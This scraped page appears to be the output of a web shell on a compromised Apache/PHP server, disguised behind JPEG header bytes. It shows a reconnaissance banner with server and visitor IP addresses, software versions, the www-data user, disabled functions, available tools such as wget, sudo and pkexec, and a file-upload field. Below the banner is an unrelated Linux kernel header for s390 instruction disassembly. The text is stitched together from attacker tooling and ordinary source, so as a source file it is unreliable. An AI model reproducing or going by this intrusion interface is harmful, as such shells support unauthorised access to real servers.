????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.133.144.147 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/modules/3.13.0-170-generic/build/arch/s390/include/asm/ |
Upload File : |
/* * Disassemble s390 instructions. * * Copyright IBM Corp. 2007 * Author(s): Martin Schwidefsky (schwidefsky@de.ibm.com), */ #ifndef __ASM_S390_DIS_H__ #define __ASM_S390_DIS_H__ /* Type of operand */ #define OPERAND_GPR 0x1 /* Operand printed as %rx */ #define OPERAND_FPR 0x2 /* Operand printed as %fx */ #define OPERAND_AR 0x4 /* Operand printed as %ax */ #define OPERAND_CR 0x8 /* Operand printed as %cx */ #define OPERAND_DISP 0x10 /* Operand printed as displacement */ #define OPERAND_BASE 0x20 /* Operand printed as base register */ #define OPERAND_INDEX 0x40 /* Operand printed as index register */ #define OPERAND_PCREL 0x80 /* Operand printed as pc-relative symbol */ #define OPERAND_SIGNED 0x100 /* Operand printed as signed value */ #define OPERAND_LENGTH 0x200 /* Operand printed as length (+1) */ struct s390_operand { int bits; /* The number of bits in the operand. */ int shift; /* The number of bits to shift. */ int flags; /* One bit syntax flags. */ }; struct s390_insn { const char name[5]; unsigned char opfrag; unsigned char format; }; static inline int insn_length(unsigned char code) { return ((((int) code + 64) >> 7) + 1) << 1; } void show_code(struct pt_regs *regs); void print_fn_code(unsigned char *code, unsigned long len); int insn_to_mnemonic(unsigned char *instruction, char *buf, unsigned int len); struct s390_insn *find_insn(unsigned char *code); static inline int is_known_insn(unsigned char *code) { return !!find_insn(code); } #endif /* __ASM_S390_DIS_H__ */